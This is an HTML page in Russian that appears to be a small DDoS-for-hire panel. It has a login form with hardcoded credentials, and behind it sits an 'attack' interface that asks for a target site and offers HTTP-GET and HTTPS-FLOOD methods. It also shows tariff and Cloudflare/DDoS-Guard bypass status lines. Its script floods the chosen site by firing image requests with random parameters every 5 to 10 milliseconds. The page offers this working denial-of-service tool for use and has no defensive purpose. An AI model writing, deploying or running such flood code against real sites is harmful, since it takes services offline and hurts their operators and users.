<!doctype html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Анимированная форма входа</title>
    <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
</head>
<style>
	body{
    margin: 0;
    padding: 0;
    font-family: sans-serif;
    background: #1f2c36;
}
.box{
    width: 300px;
    padding: 40px;
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%,-50%);
    background: #042029;
    text-align: center;
    border-radius: 25px;
}
.box h1 {
color: #fff;
    text-transform: uppercase;
    font-weight: 500;
}
.box input[type = "text"],.box input[type = "password"]{
    background: none;
    display: block;
    margin: 20px auto;
    text-align: center;
    border: 2px solid #6c0aab;
    padding: 14px 10px;
    width: 200px;
    outline: none;
    color: #fff;
    transition: 0.25s;
    border-radius: 25px;
}
.box input[type = "text"]:focus,.box input[type = "password"]:focus{
    width: 280px;
    border-color: #83004f;
}
.box input[type = "submit"]{
    background: none;
    display: block;
    margin: 20px auto;
    text-align: center;
    border: 2px solid #83004f;
    padding: 14px 40px;
    outline: none;
    color: #fff;
    transition: 0.25s;
    cursor: pointer;
    border-radius: 25px;
}
.box input[type = "submit"]:hover{
    background: #83004f;
}

body{
    background: url("https://i.ibb.co/DgL0dS8/1.jpg") no-repeat center center fixed;
    -moz-background-size: cover;
    -webkit-background-size: cover;
    -o-background-size: cover;
    background-size: cover;
   }

</style>
<body>
<form action="" class="box" method="post">
    
<h1>
        Вход
    </h1>
    <input type="text" id="login" placeholder="Имя">
    <input type="password" id="pass" placeholder="Пароль">
    <input type="submit" id="b1" value="Вход" onclick="spam()">
</form>
<script>
spam = function() {


var spam_id = escape(document.getElementById('login').value);
			if(spam_id != "1") {
				alert('не верный логин или пароль');
				return false;
			}
var spam_id = escape(document.getElementById('pass').value);
			if(spam_id != "2") {
				alert('не верный логин или пароль');
				return false;
			}
document.writeln("<!doctype html>");
document.writeln("	<html>");
document.writeln("	<head>");
document.writeln("		</head>");
document.writeln("		<style>");
document.writeln("			img {");
document.writeln("  height: 100%;");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-trigger {");
document.writeln("  height: 20px;");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-state:checked~.read-more-trigger>img {");
document.writeln("  -webkit-transform: rotate(180deg);");
document.writeln("  -moz-transform: rotate(180deg);");
document.writeln("  -ms-transform: rotate(180deg);");
document.writeln("  -o-transform: rotate(180deg);");
document.writeln("  transform: rotate(180deg);");
document.writeln("  transition: transform 0.65s ease-in-out;");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-trigger>img {");
document.writeln("  transition: transform 0.65s ease-in-out;");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-state {");
document.writeln("  display: none;");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-target {");
document.writeln("  opacity: 0;");
document.writeln("  max-height: 0;");
document.writeln("  font-size: 0;");
document.writeln("  transition: .25s ease;");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-state:checked~.read-more-wrap .read-more-target {");
document.writeln("  opacity: 1;");
document.writeln("  font-size: inherit;");
document.writeln("  max-height: 999em;");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-state~.read-more-trigger:before {");
document.writeln("  content: '';");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-state:checked~.read-more-trigger:before {");
document.writeln("  content: '';");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-state:checked~.read-more-trigger:before {");
document.writeln("  background: url(arrow%20up%20grad.svg);");
document.writeln("}");
document.writeln("");
document.writeln(".read-more-trigger {");
document.writeln("  cursor: pointer;");
document.writeln("  display: inline-block;");
document.writeln("  padding: 0 .5em;");
document.writeln("  color: #666;");
document.writeln("  font-size: .9em;");
document.writeln("  line-height: 2;");
document.writeln("  border: 1px solid #ddd;");
document.writeln("  border-radius: .25em;");
document.writeln("}");
document.writeln("</style>");
document.writeln("		<body>");
document.writeln("				<center><input type=\"submit\" value=\"Начать атаку\" onclick=\"lok()\"></center>");
document.writeln("			<center>Method: <select class=\"form-control cc-select-icon cc-mode-icon\" id=\"select_\"><option value=\"GET\">HTTP-GET</option><option value=\"FLOOD\">HTTPS-FLOOD</option></select></center>");
document.writeln("                <h3>Не пытайтесь атаковать государственные сайты на тарифе 1 уровня</h3>");
document.writeln("                <div>");
document.writeln("  <input type=\"checkbox\" class=\"read-more-state\" id=\"post-1\" />");
document.writeln("  <p class=\"read-more-wrap\">");
document.writeln("    info👇");
document.writeln("    <span class=\"read-more-target\">");
document.writeln("    	<br>");
document.writeln("  Server Status: active<br/>Tariff level: 1<br/>Cloudflare bypass: no<br/>DDoS-Guard bypass: no<br/>");
document.writeln("  <br>");
document.writeln("</span>");
document.writeln("  </p>");
document.writeln("  <label for=\"post-1\" class=\"read-more-trigger\"><img src=\"https://cdn.onlinewebfonts.com/svg/img_263788.png\"></label>");
document.writeln("</div>");
document.writeln("</body>");
document.writeln("</html>");

}
</script>
<script>
	lok = function() {
var years = prompt('Сайт для атаки (пример; magazin-andrey.ru)', );
var select = document.getElementById("select_");
var value = select.value;
if(value == "FLOOD") {
alert("Attack for https://"+years+"/ started\n method: HTTP-FLOOD"); 
function flood() {
	console.log(years)
	  
	var TARGET = years //target
   var URI = '/' //URI, make sure it starts with '/'
   var pic = new Image()
   var rand = Math.floor(Math.random() * 1000)
   pic.src = 'https://'+TARGET+URI+'&'+rand+"=asdf"
}

setInterval(flood, 10)
}
if(value == "GET") {
alert("Attack for http://"+years+"/ started\n method: HTTP-GET"); 

function imgflood() {
	console.log(years)
	  
	var TARGET = years //target
   var URI = '/' //URI, make sure it starts with '/'
   var pic = new Image()
   var rand = Math.floor(Math.random() * 100000)
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
}

setInterval(imgflood, 10)

function x2() {
	console.log(years)
	  
	var TARGET = years //target
   var URI = '/' //URI, make sure it starts with '/'
   var pic = new Image()
   var rand = Math.floor(Math.random() * 100000)
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
}

setInterval(x2, 5)
}
}
</script>
</body>
</html>
